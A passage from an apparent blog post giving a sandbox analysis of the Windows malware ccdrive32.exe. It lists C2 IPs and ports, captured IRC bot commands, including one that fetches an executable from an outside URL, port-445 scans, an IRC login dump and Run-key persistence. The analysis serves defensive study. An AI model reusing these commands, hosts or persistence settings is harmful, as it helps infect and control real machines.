204.45.6.194

Remote Host Port Number
112.78.112.208 80
218.5.74.190 80
204.45.6.194 47221

* The following ports were open in the system:

Port Protocol Process
1055 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
1058 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
1059 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2088 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2089 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2090 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2091 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2092 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2093 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2094 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2095 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2096 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2097 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2098 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2099 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2100 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2101 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2102 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2103 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2104 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2105 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2106 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2107 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2108 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2109 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2110 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2111 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2112 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2113 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2114 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2115 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2116 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2117 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2118 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2119 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2120 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2121 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2122 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2123 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2124 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2125 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2126 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2127 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2128 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2129 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2130 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2131 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2132 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2133 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2134 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2135 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2136 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2137 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2138 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2139 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2140 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2141 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2142 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2143 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2144 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2145 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2146 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2147 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2148 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2149 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2150 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2151 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2152 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2153 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2154 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2155 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2156 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2157 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2158 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2159 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2160 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2161 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2162 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2163 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2164 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2165 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2166 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2167 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2168 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2169 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2170 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2171 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2172 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2173 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2174 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2175 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2176 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2177 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2178 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2179 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2180 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2181 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2182 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2183 TCP ccdrive32.exe (%Windir%ccdrive32.exe)
2184 TCP ccdrive32.exe (%Windir%ccdrive32.exe)

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi

PRIVMSG #i :HTTP SET http://tantoun.org/odBF.exe
PRIVMSG [N00_USA_XP_5631
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
NICK [N00_USA_XP_5631253]
@ :scan// Sequential Port Scan started on 192.168.207.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE ##xddc -ix
MODE #xddc1 -ix
MODE #xddc2 -ix
USER SP2-201 * 0 :COMPUTERNAME
MODE [N00_USA_XP_5631253]
@ -ix

* There was an outbound traffic produced on port 47221:

00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4A4F | PASS letmein..JO
00000010 | 4A4F 2023 762C 234D 6120 6F6F 6F6F 0D0A | JO #v,#Ma oooo..
00000020 | 4A4F 4A4F 2023 762C 234D 6120 6F6F 6F6F | JOJO #v,#Ma oooo
00000030 | 0D0A | ..

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%ccdrive32.exe”

so that ccdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%ccdrive32.exe”

so that ccdrive32.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
ccdrive32.exe %Windir%ccdrive32.exe 339 968 bytes

Categories: Uncategorized
Previous post
Next post